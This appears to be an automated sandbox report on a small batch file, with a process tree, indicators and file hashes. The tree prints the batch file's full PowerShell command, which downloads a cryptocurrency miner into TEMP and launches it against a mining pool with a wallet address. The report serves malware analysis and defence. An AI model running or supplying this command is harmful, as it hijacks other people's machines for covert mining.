b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
148s
max time network
159s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
02/02/2024, 21:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
6	4992	powershell.exe
12	4992	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1596	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1596	cpuminer-sse2.exe
1596	cpuminer-sse2.exe
1596	cpuminer-sse2.exe
1596	cpuminer-sse2.exe
1596	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4992	powershell.exe
4992	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4992	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4836 wrote to memory of 4992	4836	cmd.exe	85
PID 4836 wrote to memory of 4992	4836	cmd.exe	85
PID 4992 wrote to memory of 1640	4992	powershell.exe	93
PID 4992 wrote to memory of 1640	4992	powershell.exe	93
PID 1640 wrote to memory of 1596	1640	cmd.exe	95
PID 1640 wrote to memory of 1596	1640	cmd.exe	95

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4992
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1640
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1596

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_chc4iped.lk1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
706KB

MD5
141cfd7cf12412aba084fd93aba9caec

SHA1
7c06d4338ac902d73dd0cff8b9ed164353df2713

SHA256
234a23f0ead001bb12cc4c985203068a6251f96010a2b63f2edd4f11ad6c54da

SHA512
2af4738153f8b44f24c786422534a339440bdea1b935599e4a3e7d1be3ee289b544de589139e901709c10b759b6abbe7d6f6c02d674b0a96231fc52c706b3db9

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
760KB

MD5
c17426f0db8d77dc9f566b74633addae

SHA1
42f36525ddc571a93b507d0f9b3697dde1705132

SHA256
a2c674ff4259005b9453419ac16291c90946cd7b297eea590adcc7689528f584

SHA512
0bfb0ca07c682cd8ce4ada39f5e44494836cd7d2ebf21fe7898c7cd0c3228941e043f8431e79a84a6fc372240749c82040830d3075c8d2bcad481310a12b053a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
520KB

MD5
002215e3373ccb858fc69099af975ca4

SHA1
b416a88cf41671deb037a8051c79d9838ec34e59

SHA256
3a7004611016435898f127eba1bde1f7decc2b994d794c056a81624d790f6a89

SHA512
84d0dcbff2742097726c228a844d82c52887ec2cf407a210252d54d6ed9c4410d06ccbdcfb88bc0aaa7a329c26f5201fcd9bdd1eb3c6cfea4b133f27fb42b5fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
770KB

MD5
46cdc48a410bb8794a77e03662d3ce4f

SHA1
339cd4a02fafdf4e99b7e152739bc0e0b8d8bea6

SHA256
21ecb8eb27d889b060308e2eb26457bbb29b350c65551aa1dd5aa5b1dd0ff891

SHA512
0cc71105bed538112fd3dcd86ae802d9cdf1e859b673613206be56a9a3e5fcf7de2a175829cf6ac685dc33401f7cce454b3bb59090285f70dc25d6946db3d27e

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
627KB

MD5
a21aa9a9f54ed170bbdd60b4831083c0

SHA1
eb9a8b4e7f50077a75c9ca45d8bbd71e5803bf59

SHA256
87a5d5e03dfa4b9474aa1b17d18aac2a81929f6782e7f03983cf222bc32c42a4

SHA512
c7ccd139ccd6b40333d3ba7a113644c5c0903c76022d29249e2e369d85ccee707a12433c0ff1a090d3a675946b0b94d6f191b57cf6e1fccfc3dd1952d62e5929

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
691KB

MD5
5bda0ab5f7892d5689eb8378a0f16407

SHA1
97c03beb808828159a24199f34e33eca3f6a46dd

SHA256
0343306650b7303661493af7dbf91b84a32f2731d4b0c695dcff3f454387bbf3

SHA512
5c0feb10c2f799104b5cee6f0b5d34285ba92bef27a4596994912fed10182ac18751866dd15644882447a99eb0ab6b316cdbb293353b130dca07545c25e99f95

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
740KB

MD5
42f3ea4643063d9d09eae8bafea29d62

SHA1
1013f94bff5feb20ec2aa6d4dde022e523d46d72

SHA256
80b4dfa2263d4058c4cffa69438fd2dd60a4f4a0a12ddcfdfe499436bbd3a811

SHA512
1122970a08bbd9caf73715d8fe2c9129b93f36f5e4629abf06ab63050ed73114f3643d63a9cd700b5d9995a71bab144b98644d2d934224c149d593c257efb56f

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1596-74-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1596-73-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1596-128-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1596-123-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1596-118-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1596-113-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1596-108-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1596-103-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1596-98-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1596-88-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1596-83-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1596-77-0x0000000001010000-0x00000000028C5000-memory.dmp

Filesize
24.7MB

Download
memory/1596-75-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1596-76-0x0000000061140000-0x00000000611D8000-memory.dmp

Filesize
608KB

Download
memory/4992-16-0x00000211B8680000-0x00000211B8696000-memory.dmp

Filesize
88KB

Download
memory/4992-15-0x00000211B86A0000-0x00000211B86B0000-memory.dmp

Filesize
64KB

Download
memory/4992-11-0x00000211B85E0000-0x00000211B85F0000-memory.dmp

Filesize
64KB

Download
memory/4992-0-0x00000211BA720000-0x00000211BA7B2000-memory.dmp

Filesize
584KB

Download
memory/4992-12-0x00000211BA9D0000-0x00000211BAADE000-memory.dmp

Filesize
1.1MB

Download
memory/4992-13-0x00007FFBE14D0000-0x00007FFBE1F91000-memory.dmp

Filesize
10.8MB

Download
memory/4992-14-0x00000211B86A0000-0x00000211B86B0000-memory.dmp

Filesize
64KB

Download
memory/4992-6-0x00000211B8630000-0x00000211B8652000-memory.dmp

Filesize
136KB

Download
memory/4992-19-0x00000211B86A0000-0x00000211B86B0000-memory.dmp

Filesize
64KB

Download
memory/4992-17-0x00007FFBE14D0000-0x00007FFBE1F91000-memory.dmp

Filesize
10.8MB

Download
memory/4992-18-0x00000211B86A0000-0x00000211B86B0000-memory.dmp

Filesize
64KB

Download
memory/4992-60-0x00007FFBE14D0000-0x00007FFBE1F91000-memory.dmp

Filesize
10.8MB

Download
memory/4992-22-0x00000211BA910000-0x00000211BA91A000-memory.dmp

Filesize
40KB

Download
memory/4992-21-0x00000211BA930000-0x00000211BA942000-memory.dmp

Filesize
72KB

Download